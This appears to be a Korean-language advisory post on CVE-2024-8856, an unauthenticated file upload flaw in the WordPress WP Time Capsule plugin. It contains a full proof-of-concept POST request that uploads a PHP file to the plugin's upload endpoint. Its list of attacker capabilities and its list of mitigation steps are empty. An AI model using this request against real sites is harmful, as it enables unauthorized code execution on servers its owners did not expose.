
워드프레스 WP Time Capsule 플러그인 임의 파일 업로드 취약점
CVE-2024-8856는 WordPress용 WP Time Capsule 플러그인에서 발견된 보안 취약점으로, 인증되지 않은 사용자가 서버에 임의의 파일을 업로드할 수 있습니다. 이는 업로드된 파일이 서버에서 실행될 경우 원격 코드 실행으로 이어질 수 있습니다. 이 취약점은 불충분한 파일 검증으로 인해 발생하며, 취약한 엔드포인트에 특수하게 조작된 요청을 전송하여 악용할 수 있습니다.
이 취약점은 인증되지 않은 사용자가 다음을 수행할 수 있게 합니다:
다음은 취약한 엔드포인트에 POST 요청을 전송하여 CVE-2024-8856 취약점을 악용하는 방법을 보여주는 개념 증명입니다.
POST /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php HTTP/1.1
Host: wordpress.local
Content-Length: 199
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHvQu3NOpI44bLkPN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Origin: http://wordpress.local
Content-Disposition: 18.php
Accept-Encoding: gzip, deflate, br
Connection: close
------WebKitFormBoundaryHvQu3NOpI44bLkPN
Content-Disposition: form-data; name="files"; filename="php"
Content-Type: application/sql
<?php phpinfo();
------WebKitFormBoundaryHvQu3NOpI44bLkPN--
<?php phpinfo();가 포함된 PHP 파일을 업로드하려고 시도하며, 실행되면 PHP 구성 세부 정보를 표시합니다./wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php는 악용 지점입니다.이 취약점을 완화하려면:
CVE-2024-8856 - National Vulnerability Database
CVE-2024-8856는 WP Time Capsule 플러그인을 사용하는 WordPress 사이트 관리자가 즉시 주의를 기울여야 하는 심각한 취약점입니다. 잠재적인 악용으로부터 애플리케이션을 보호하기 위해 적절한 예방 조치를 취해야 합니다. 항상 보안 관행과 플러그인 업데이트를 최신 상태로 유지하십시오.